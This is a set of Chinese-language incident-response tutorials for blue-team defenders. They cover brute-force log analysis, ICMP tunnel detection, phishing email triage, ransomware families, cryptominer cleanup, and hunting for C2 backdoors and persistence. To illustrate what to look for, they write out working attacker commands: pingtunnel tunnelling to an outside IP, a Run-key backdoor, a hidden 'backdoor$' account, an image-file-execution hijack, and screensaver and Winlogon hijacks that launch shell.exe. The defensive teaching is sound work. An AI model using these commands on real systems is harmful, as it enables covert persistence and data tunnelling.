应急响应-爆破事件与隧道流量 爆破事件前言无论是在内网还是外网，口令爆破都是屡见不鲜的事情。但是相对于内网，外网的口令爆破相对比较困难，基本都是复杂的口令，比较难突破。对于内网来说，运维人员会觉得内网比较安全，与DMZ区是隔离开的，所以会比较放松这方面的管束。同时内网的口令可以通过hash传递，只要有一台权限被拿下，那么就很容易进行横向移动。对于口令爆破事件，我们应该怎么去处理这类事件呢？首先我们得明确口令爆破的服务，以及对应服务的日志存储位置，查看日志其次我们得明确日志中有哪些可供我们判断的特征和属性，来确定是否存在爆破行为以及是否爆破成功如果出现非常多的日志，那么我们可以借助一些工具来进行分析SSH爆破首先明确SSH日志的存放位置在# CentOS /var/log/secure # 或者 /var/log/auth.log查看日志cat /var/log/secureFailed password for invalid user postgres from 192.168.139.1 port 23899 ssh2Accepted password for root from 192.168.139.1 port 23568 ssh2通过这两个特征就可以总结出一个快速查看是否登录成功的脚本了# 查看成功登陆： cat /var/log/secure | grep "Accept" # 查看失败登陆： cat /var/log/secure | grep "Failed password for"通过日志我们可以看到只存在一个登录成功，并且其他都是登录失败，同时，这些登录失败的事件都是同一个时间点，说明是并发登录操作，结合我们确定这个登录成功是否为管理员自己的操作可以得出答案。这个登录操作并非管理员自己的操作，攻击者在短时间内对服务器进行SSH爆破，同时在9:21:03爆破成功RDP爆破同样首先明确日志存储位置查看日志通过这两个事件ID就可以判断是否出现爆破事件了，同时要关注LogonType可以总结出本次事件的流程：由同一时间大量审核失败的日志可知，攻击者通过3389端口开放于9:51:59进行RDP爆破攻击，然后于9:53:39登录成功。SMB爆破SMB同样也是在Windows事件管理器的安全日志中查看LogonType总结标注加粗的就是重点了，通常会通过这几种方式进行爆破Logon type 2 Interactive 本地交互登录。最常见的登录方式。Logon type 3 Network 网络登录 - 最常见的是访问网络共享文件夹或打印机。Logon type 4 Batch 计划任务Logon Type 5 Service 服务：某些服务是用一个域帐号来运行的，出现Failure常见的情况是管理员更改了域帐号密码，但是忘记重设Service中的帐号密码。Logon Type 7 Unlock 解除屏幕锁定Logon Type 8 NetworkCleartext 网络明文登录，通常发生在IIS 的 ASP登录。不推荐Logon Type 9 NewCredentials 新身份登录Logon Type 10 RemoteInteractive 远程登录 Logon Type 11 CachedInteractive 缓存登录有人可能会问横向移动不是还有WMI、DCOM这些手法吗？为什么不讲讲这些手法？因为WMI横向移动的手法是不会记录在Windows日志中的，所以说我们在日志中看不到这种横向移动手法的数据，也就没法分析了。MSSQL爆破查看日志登录成功和失败的消息通过日志分析可以得出结论192.168.3.31对本机于10:30:56进行爆破，于10:31:47登录成功总结首先我们得明确一个问题，那么多服务，我们怎么都知道他们的日志在哪里？根据上面的几个服务，我们可以发现一个规律，那就是该服务依赖什么搭建起来的日志多半就在那个被依赖的应用目录下。比如说：SSH是系统自带了，那么他就在系统默认的/var/log下，RDP和SMB也是系统自带的，那么他们就在Windows日志下，MSSQL它自己是一个应用，那么他就在自己应用中存在日志，根据这种规律，我们可以快速定位日志所在从而进行分析，最后进行应急处置。针对爆破事件的应急处置一般采用封禁IP、封锁协议、限制登录请求的次数等方式，通过这种方式就能很好的防止爆破了。隧道流量这边讲述一种隧道即可，其他隧道分析定性和处置方式也是差不多的ICMP隧道Linuxsudo ./pingtunnel -type server -key 1234 sudo ./pingtunnel -type client -l :4445 -s 47.96.86.122 -t 47.96.86.122:4444 -tcp 1 -key 1234 通过netstat -anpt只能看到开放4445，不知道连接到谁了，也不知道该进程是什么在这种情况下就要采用专门的工具来进行分析GitHub - Just-Hack-For-Fun/Request_Monitor: 这是一个通过监听网络请求获取发起请求进程的脚本使用方法如下：ICMP/DNS 隧道处置方法 | Linux 应急响应sudo apt update sudo apt install bpftrace chmod +x request_monitor.sh chmod +x request_monitor.bt# 假设告警icmp隧道连接到47.96.86.122 sudo ./request_monitor.sh 47.96.86.122 ps -aux 实锤ICMP隧道，直接kill对应进程，然后封锁IP地址或者ICMP协议Windows同样是受害者机器连接到对应的攻击机pingtunnel.exe -type client -l :4445 -s 47.96.86.122 -t 47.96.86.122:4444 -tcp 1 -key 1234 同样也是看不见对应的PID和外联地址通过WireShark观察流量只能看到大量ICMP数据包与47.96.86.122这个地址外联，同样也看不到进程什么的这时候我们就得用到Microsoft Message Analyzer这款微软自带的抓包工具选中数据包打开所有Detail详情页此处即有PID实锤ICMP隧道利用工具，直接结束进程，封锁IP地址，然后限制ICMP协议即可

应急响应-钓鱼EML分析与简单恶意程序分析 前言在一些攻防对抗的环境中，经常会出现类似邮件钓鱼来快速获取权限的情况，在这种情况下，作为蓝队成员应该如何快速定位攻击者，迅速做出应急响应呢？接下来我们就来探讨一些关于邮件可以获取的信息，以及如何确定这是钓鱼攻击和它钓鱼的目的是做什么。EML文件分析如何分析邮件的安全性看发信人地址看发信内容信息看发信内容附件对于邮件，我们通常从这三部分进行分析，从而来定性他是否为钓鱼攻击，从常规的网页来看肯定不行，我们得从邮件的特有格式eml文件来进行查看比较合适。查看发信人地址将邮件查看原文或者以eml格式导出查看发信内容信息底下的Base64加密就是内容查看发信内容附件底下那么多Base64加密的数据就是附件的数据，只需要base64解密之后输出为文件即可。钓鱼邮件分析-第一封分析发件人地址将域名和IP地址都到微步情报查询发现是白名单，别急我们继续往下看查看发信内容信息较为可疑，引导下载附件程序。查看发信内容附件恶意程序分析上传该文件到微步沙箱进行分析到这里基本实锤它是钓鱼邮件，且钓鱼的目的就是上线后门钓鱼邮件分析-第二封查看发信人地址查看发信内容信息引导用户下载附件，较为可疑查看发信内容附件filename已经解密发现是zip后缀，对Base64加密后的数据进行解密保存恶意程序分析猜测监听端口应该是为了上线后门，那么列举文件是要做什么？我们可以思考一下，25端口是收发邮件的端口，对这么多服务器的25进行数据发送，再加上它是通过邮件传播的蠕虫病毒，那么我们就可以知道列举文件的目的就是找到当前系统中所有文件存在的邮箱，然后对这些邮箱进行进一步的传播。在得知这些内容之后，我们可以对进程进行清除，新增的权限维持也进行清除确保无再次上线的后门存在，然后就可以输出报告了参考文章-手工分析https://mp.weixin.qq.com/s/gFbewpQrWNTnsVpDzI1OQw参考文章-大量样本分析https://xz.aliyun.com/users/64919/news

应急响应-勒索病毒 什么是勒索病毒一种新型电脑病毒，主要以RDP爆破、邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大，一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密，被感染者一般无法解密，必须拿到解密的私钥才有可能破解。2019年末，勒索已然呈现出"双重勒索"的趋势，即先窃取商业数据，然后实施勒索，如果未能在规定时间内支付赎金，将于网上（通常是暗网）公开售卖企业的商业数据。勒索病毒的表现系统瞬时CPU占用高，接近100%，这个现象主要是在批量加密文件。所有应用都被无法使用和打开。系统应用文档被加密无法修改。文件后缀被修改并留下勒索信。桌面主题被修改。入侵手法-参考文章TellYouThePass勒索病毒入侵手法揭秘勒索病毒分类LockBit：LockBit于2019年9月首次以 ABCD勒索软件的形式出现，2021年发布2.0版本，相比第一代，LockBit 2.0号称是世界上最快的加密软件，加密100GB的文件仅需4分半钟。经过多次改进成为当今最多产的勒索软件系列之一。LockBi使用勒索软件即服务 (RaaS)模型，并不断构思新方法以保持领先于竞争对手。它的双重勒索方法也给受害者增加了更大的压力（加密和窃取数据），据作者介绍和情报显示LockBi3.0版本已经诞生，并且成功地勒索了很多企业。Gandcrab/Sodinokibi/REvil：REvil勒索软件操作，又名Sodinokibi，是一家臭名昭著的勒索软件即服务 (RaaS) 运营商，可能位于独联体国家（假装不是老毛子）。它于 2019 年作为现已解散的 GandCrab 勒索软件的继任者出现，并且是暗网上最多产的勒索软件之一，其附属机构已将目标锁定全球数千家技术公司、托管服务提供商和零售商,一直保持着60家合作商的模式。（2021年暂停止运营，抓了一部分散播者）。Dharma/CrySiS/Phobos：Dharma勒索软件最早在 2016 年初被发现， 其传播方式主要为 RDP 暴力破解和钓鱼邮件，经研究发现 Phobos勒索软件、CrySiS勒索软件与 Dharma勒索软件有 许多相似之处，故怀疑这几款勒索软件的 作者可能是同一组织。Globelmposter（十二生肖）：Globelmposter又名十二生肖，十二主神，十二.....他于2017年开始活跃，2019年前后开始对勒索程序进行了大的改版变更。攻击者具有一定的地域划分，比如国内最常见的一个攻击者邮箱为China.Helper@aol.comWannaRen（已公开私钥）：WannaRen勒索家族的攻击报道最早于2020年4月，通过下载站进行传播，最终在受害者主机上运行，并加密几乎所有文件；同时屏幕会显示带有勒索信息的窗口，要求受害者支付赎金，但WannaRen始终未获得其要求的赎金金额，并于几天后公开密钥。Conti：Conti勒索家族的攻击最早追踪到2019年，作为"勒索软件即服务（RaaS）"，其幕后运营团伙管理着恶意软件和Tor站点，然后通过招募合作伙伴执行网络漏洞和加密设备。在近期，因为分赃不均，合作伙伴多次反水，直接爆料攻击工具、教学视频、以及部分源代码。WannaCry：WannaCry（又叫Wanna Decryptor），一种"蠕虫式"的勒索病毒软件，由不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞"EternalBlue"（永恒之蓝）进行传播，WannaCry的出现也为勒索病毒开启了新的篇章。其他家族分析定性勒索病毒人工分析以WannaCry为例，我们来看它有那些特征通过加密格式来判断通过桌面的形式来判断通过勒索者的邮箱来判断家族这边没有留下邮箱，故而没有进行展示通过勒索者留下的勒索信为例平台分析安全卫士勒索病毒专题:文件恢复_安全卫士离线救灾版_文档卫士勒索病毒拦截|文件恢复_文档守护者保护文档安全 - 腾讯电脑管家https://lesuo.venuseye.com.cn/勒索病毒搜索腾讯哈勃分析系统统一端点安全管理系统aES(终端检测响应EDR)-深信服应急处置分析家族样本在熟悉逆向的情况下可以对恶意文件进行逆向分析判断是否存在解密手段通过各大搜索引擎搜索解密方式，存在解密方式的话就直接进行解密:::danger通过一个Satan（撒旦）勒索病毒来演示可以解密的情况通过安全公司提供的解密软件可以成功解密:::不存在解密方式的话寻求解密公司或者安全公司重装系统处置封锁攻击入口通过上一节的知识，我们可以通过本机资产梳理判断存在那些服务存在被攻击的可能性，从而来锁定攻击的入口点，比如说WannaCry刚出现的时候是通过永恒之蓝大批量勒索，我们可以根据这些勒索病毒出现的特征点来锁定入口点，当然这并不是绝对的，也可能通过RDP爆破口令进入，要根据具体情况分析。

应急响应-挖矿病毒 挖矿病毒来源随着虚拟货币的疯狂炒作，挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。它可以利用个人电脑或服务器进行挖矿，具体现象为CPU拉满，网络阻塞，服务器卡顿等。挖矿病毒大致植入流程入口点丢失权限：口令爆破、Web后门等攻击者通过上传执行程序或脚本运行程序或脚本（有些会清理其他同行程序）下载的挖掘程序，并写入权限维持技术排查方向通过CPU占用率来筛选出进程通过外部网络连接筛选出恶意地址排查流程分析定性通过占用大量CPU的进程找到恶意文件上传威胁情报平台进行解析分析通过网络找到外链，将URL或者IP上传到威胁情报平台进行解析分析应急处置排查权限维持手段：启动项、计划任务、服务等排查入口攻击点：口令爆破、Web丢失权限等及时隔离主机，阻断异常网络通信：封禁IP，开启防火墙，指定防火墙策略来限制传输协议等Windows 2022挖矿主机分析参考文章与环境应急响应靶机练习-Web5 WindowsServer挖矿案例记录分析定性首先查看CPU占用率，看到有一个进程占用近乎百分百的CPU查看对应程序所在目录，发现一些可疑文件查看从中得到一个域名地址接着从网络连接中提取IP地址将exe和url、IP地址放到威胁情报平台分析可以看到微步已经标记URL以及exe文件均为挖矿恶意网址和程序，到这时候我们就基本定性它是挖矿事件了应急处置排查权限维持手段接下来我们要对这个挖矿程序进行应急处置，排查他是否存在一些权限维持的手段计划任务发现就一个命名较为可疑的程序，而且他的运行程序还是个bat，我们查看一下对应路径下的文件所以删除此定时任务，我们继续排查启动项有时候定时任务删除之后，我们还发现挖矿程序还在运行，这时候我们就可以考虑是否有一个启动项服务一直在自动运行通过命令msconfig发现启动项文件启动恶意挖矿文件c3pool经排查，其他的权限维持就没有了排查入口点梳理本机资产查看Windows日志因为没有web服务，故而我们现在只需要查看本地的Windows日志即可通过eventvwr.msc查看Windows安全日志，重点看安全日志根据恶意文件的修改日期，我们可以快速定位到事件发生时间段可以看到这个日志中展示了，在同一时间内，出现了大量的登录请求，且大部分都是失败的，仅有一个成功。得出结论通过本机开放端口和Windows日志分析，基本可以确定是3389端口开放造成的口令爆破。（因为本机并未加入域环境，故而445端口的横向移动不太可能）。隔离主机通过防火墙封禁对应的IP地址，同时修改主机管理员账号密码，增强密码强度，限制3389端口的访问，防止再次通过这个入口拿到权限。同时删除所有的挖矿程序以及启动项、计划任务，最后重启测试一下是否还会出现挖矿病毒。Linux主机挖矿分析分析定性原本没有执行挖矿程序的状态上传威胁情报平台分析参考文章这边仅仅做挖矿病毒在Linux上的展示，具体的实战靶场参考下面的文章，因为环境问题无法复现Linux靶机应急响应-页面篡改、挖矿查杀

应急响应-C2后门、权限维持排查思路与基线检查 常规C2后门分析检测没有隐匿手法在没有隐匿手法的情况下，因为一个C2他在运行时必定会创建进程与对外的网络连接，通过这两点，我们可以对其进行排查初步排查-使用火绒剑等类似程序查看进程和网络进一步确认-上传文件到微步等沙箱平台测试将初步排查的文件保存下来，然后上传到类似微步云沙箱进行测试，以及远程IP地址进行查询有隐匿手法比如说CDN、云函数、中转等，这些后续再了解，这边仅普及基础，基础完善之后再了解进阶处置手段定位到恶意文件之后，我们要对其进行进一步的处置清除将定位到的文件进行删除处理封锁通过防火墙策略进行封锁处理，比如说阻止程序、协议、IP先判断是反向还是正向封锁至于一些协议的封锁，我发现防火墙的HTTP协议只针对远程的80端口，而且不可以修改，这样太过有限了，起不到封锁的作用总结最有效的封锁方式就是直接禁用远程IP地址的访问，但是这样会影响到业务的正常运行，具体采用哪种方式还得根据实际情况来决定。权限维持排查在解决了初步发现的后门之后，我们还要对主机进行一次权限维持的排查，因为攻击者可能想持续控制这台主机，所以在这台主机上留下一些自启动、隐藏账户、映像劫持、屏保或登录启动等权限维持手段自启动排查REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" 隐藏账户net user backdoor$ admin!@#45 /add lusrmgr.msc然后删除即可映像劫持REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe" # 当运行notepad时就会运行shell.exe通过PCHunter可以看到屏保或者登录触发reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" 其他像是Rookit、Web内存马等进阶知识后续再进行补充基线检查-综合项目WindowsGitHub - selinuxG/Golin: 弱口令检测、 漏洞扫描、端口扫描（协议识别，组件识别）、web目录扫描、等保模拟定级、自动化运维、等保工具（网络安全等级保护现场测评工具）内置3级等保核查命令、基线核查工具、键盘记录器golin.exe windowsGitHub - m-sec-org/d-eyes: D-Eyes为M-SEC社区一款检测与响应工具GitHub - FindAllTeam/FindAll: Automated analysis of network security emergency response tools.（自动化分析网络安全应急响应工具）这款工具可以支持分布式，就是将Agent发给其他机器，然后本机装server端，其他机器收集到的信息可以到server来查看GitHub - DeEpinGh0st/WindowsBaselineAssistant: Windows安全基线核查加固助手LinuxGitHub - selinuxG/Golin: 弱口令检测、 漏洞扫描、端口扫描（协议识别，组件识别）、web目录扫描、等保模拟定级、自动化运维、等保工具（网络安全等级保护现场测评工具）内置3级等保核查命令、基线核查工具、键盘记录器GitHub - m-sec-org/d-eyes: D-Eyes为M-SEC社区一款检测与响应工具GitHub - Ashro-one/Ashro_linux: Linux通用应急响应脚本，适用大多数情况。不如手敲GitHub - sun977/linuxcheckshoot: linux应急响应检查脚本单机终极版